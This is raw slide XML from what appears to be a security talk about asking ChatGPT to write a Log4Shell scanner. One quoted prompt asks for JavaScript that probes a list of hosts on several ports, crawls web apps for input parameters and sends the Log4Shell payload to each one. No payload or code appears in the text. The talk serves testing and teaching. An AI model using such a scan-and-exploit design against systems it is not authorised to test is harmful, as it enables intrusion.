              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>est a list of IP/domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>est input parameters instead of a single header only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7943B82-1CCC-0DF3-1C03-2FFA251DF5E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3358195" y="4815147"/>
            <a:ext cx="5945858" cy="1528624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>What would be required to be added</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-DE" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>ead-in a list of I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>s/domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Find out if there is something answering to an HTTP request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Crawl the application and find input parameters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3974645776"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:wipe dir="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FD1440E-8918-DD8F-5750-8D6229F1B247}"/>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808F608D-57A8-66F4-FD41-789806251A23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49B03190-3422-47EE-D658-0224E4888AE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Thank you ChatGPT!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FF2C885-4E68-249B-7EF9-846D73EDE6A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="934312"/>
            <a:ext cx="3378200" cy="5486400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCAB4EFE-431C-6596-FA37-7EB38231771D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3981281" y="1600020"/>
            <a:ext cx="7724211" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can you update the provided </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> code to read-in a list of IPs and domains, so it will be able to test all of my applications in my network? It should try to connect to all IP's and domains finding out if there is an answer on a range of TCP ports. For now let's focus on ports 80, 443, 8080 and 8888. The list should easily be adjustable. If something from the input list is responding with a standard http response, the application should be crawled and a list of URL's with input parameters should be identified. For each input parameter the attack payload should be sent to test if it is vulnerable to the log4shell vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2313145009"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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18D66F5-5E8B-B75F-CE2F-9027BB059142}"/>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E61C6BFC-1368-857A-B561-17E05A16EB3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B09532-E253-6003-84F7-1A1A41477864}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Let’s see what it does</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CE0C1E5-8967-6262-8B12-6AD65C8D9B20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="418033" y="1116195"/>
            <a:ext cx="3263900" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89A5F6E8-AAB4-19E7-F9DA-F19AC3A628B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4159306" y="2331263"/>
            <a:ext cx="7515199" cy="2195473"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Looks simple enough for me to use it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-DE" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>reate a target TXT file </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>un a simple node command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>sing a node module called cheerio to parse HTML responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>It also outputs the test results </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2760529955"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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178D569-14B5-E511-A4B9-CFCE82136542}"/>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362E56C0-1DCE-1CFE-94D4-F4F7DFB9C16C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{831CD34A-0178-153D-7F6A-BFF65544B361}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Let’s see w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>ha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>t it does</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48CF0A2A-1EF7-1291-F5E7-AD0666457D42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="368510" y="1123503"/>
            <a:ext cx="7772400" cy="4934676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52AF41F0-7DEA-0DC5-27E3-39AA50AA8372}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8426406" y="3298453"/>
            <a:ext cx="3397084" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>That didn’t work! </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4242779743"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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69BB76A-787D-DEE1-5645-08F42EE4D1BF}"/>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B148019B-0BE9-923F-1979-EE4537EF931F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14497A3E-3665-3D15-EA2C-F235024A8D1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Let’s see w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>ha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>t it does</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76BCAC3C-DD06-8619-75E0-28D70D0461C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="397495" y="1055674"/>
            <a:ext cx="3390900" cy="5410200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6E9D717-C254-0E41-E872-381D2055EFF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3988738" y="1924374"/>
            <a:ext cx="7850301" cy="3672800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Let’s ask for an update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-DE" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
